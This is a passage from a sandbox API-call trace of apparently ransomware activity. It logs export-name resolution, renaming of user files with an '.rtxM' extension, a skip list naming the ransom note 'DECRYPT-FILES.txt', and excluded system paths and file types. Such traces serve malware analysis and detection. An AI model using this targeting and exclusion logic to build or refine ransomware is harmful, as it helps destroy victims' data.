(lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.085] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.085] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.085] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.085] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.085] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.085] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.085] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.085] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.085] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.086] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.086] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.086] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.086] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.086] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.086] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.086] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.086] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.086] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.086] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.086] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.086] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.086] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.086] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.086] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.086] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.086] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.086] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.086] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.086] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.087] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms") returned 134 [0080.087] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.rtxM") returned 139 [0080.087] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\eb282ead62b4db87.automaticDestinations-ms.rtxM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\eb282ead62b4db87.automaticdestinations-ms.rtxm"), dwFlags=0x0) returned 1 [0080.088] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.088] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.088] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.089] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe3b6c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabe3b6c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.089] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.089] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.089] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.089] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.089] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.089] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 93 [0080.089] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.089] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0080.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\jkbimi8.tmp" [0080.089] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.090] CloseHandle (hObject=0x0) returned 0 [0080.090] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.090] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe3b6c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabe3b6c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe3b6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.090] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0080.090] CloseHandle (hObject=0x458) returned 1 [0080.090] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9e78b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a9e78b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a9e78b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1ae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AVwBYYGM.lnk", cAlternateFileName="")) returned 1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="autorun.inf") returned 1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="boot.ini") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="desktop.ini") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="ntuser.dat") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="iconcache.db") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="bootsect.bak") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="ntuser.dat.log") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="thumbs.db") returned -1 [0080.090] lstrcmpiW (lpString1="AVwBYYGM.lnk", lpString2="Bootfont.bin") returned -1 [0080.090] lstrlenW (lpString="AVwBYYGM.lnk") returned 12 [0080.090] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.090] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab64670, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ab64670, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ab64670, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BeweMui.lnk", cAlternateFileName="")) returned 1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="autorun.inf") returned 1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="boot.ini") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="desktop.ini") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="ntuser.dat") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="iconcache.db") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="bootsect.bak") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="ntuser.dat.log") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="thumbs.db") returned -1 [0080.091] lstrcmpiW (lpString1="BeweMui.lnk", lpString2="Bootfont.bin") returned -1 [0080.091] lstrlenW (lpString="BeweMui.lnk") returned 11 [0080.091] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.091] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ee52f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89ee52f0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89f0b450, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1503, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bp7D8ssZyaPUB.lnk", cAlternateFileName="BP7D8S~1.LNK")) returned 1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="autorun.inf") returned 1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="boot.ini") returned 1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="desktop.ini") returned -1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="ntuser.dat") returned -1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="iconcache.db") returned -1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="bootsect.bak") returned 1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="ntuser.dat.log") returned -1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="thumbs.db") returned -1 [0080.091] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.lnk", lpString2="Bootfont.bin") returned 1 [0080.091] lstrlenW (lpString="Bp7D8ssZyaPUB.lnk") returned 17 [0080.091] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.091] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac95170, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac95170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac95170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf73, dwReserved0=0x0, dwReserved1=0x0, cFileName="BQQtijYG2l71UpFZBjuL.flv.lnk", cAlternateFileName="BQQTIJ~1.LNK")) returned 1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="autorun.inf") returned 1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="boot.ini") returned 1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="desktop.ini") returned -1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="ntuser.dat") returned -1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="iconcache.db") returned -1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="bootsect.bak") returned 1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="thumbs.db") returned -1 [0080.091] lstrcmpiW (lpString1="BQQtijYG2l71UpFZBjuL.flv.lnk", lpString2="Bootfont.bin") returned 1 [0080.091] lstrlenW (lpString="BQQtijYG2l71UpFZBjuL.flv.lnk") returned 28 [0080.092] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.092] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x894a1410, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x894a1410, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x894a1410, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xec7, dwReserved0=0x0, dwReserved1=0x0, cFileName="CjScda.lnk", cAlternateFileName="")) returned 1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="autorun.inf") returned 1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="boot.ini") returned 1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="desktop.ini") returned -1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="ntuser.dat") returned -1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="iconcache.db") returned -1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="bootsect.bak") returned 1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="ntuser.dat.log") returned -1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="thumbs.db") returned -1 [0080.092] lstrcmpiW (lpString1="CjScda.lnk", lpString2="Bootfont.bin") returned 1 [0080.092] lstrlenW (lpString="CjScda.lnk") returned 10 [0080.092] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.092] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c37a30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8adebdd0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8adebdd0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe49, dwReserved0=0x0, dwReserved1=0x0, cFileName="COGT.lnk", cAlternateFileName="")) returned 1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="autorun.inf") returned 1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="boot.ini") returned 1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="desktop.ini") returned -1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="ntuser.dat") returned -1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="iconcache.db") returned -1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="bootsect.bak") returned 1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="ntuser.dat.log") returned -1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="thumbs.db") returned -1 [0080.092] lstrcmpiW (lpString1="COGT.lnk", lpString2="Bootfont.bin") returned 1 [0080.092] lstrlenW (lpString="COGT.lnk") returned 8 [0080.092] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.092] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xce5f0760, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xce5f0760, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0080.092] lstrcmpW (lpString1="CustomDestinations", lpString2=".") returned 1 [0080.092] lstrcmpW (lpString1="CustomDestinations", lpString2="..") returned 1 [0080.092] lstrcatW (in: lpString1="CustomDestinations", lpString2="\\" | out: lpString1="CustomDestinations\\") returned="CustomDestinations\\" [0080.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.092] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Program Files") returned 0x0 [0080.092] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch=":\\Windows") returned 0x0 [0080.092] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Games\\") returned 0x0 [0080.092] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\All Users") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="AhnLab") returned 0x0 [0080.093] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.093] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.093] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\jkbimi8.tmp") returned 102 [0080.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 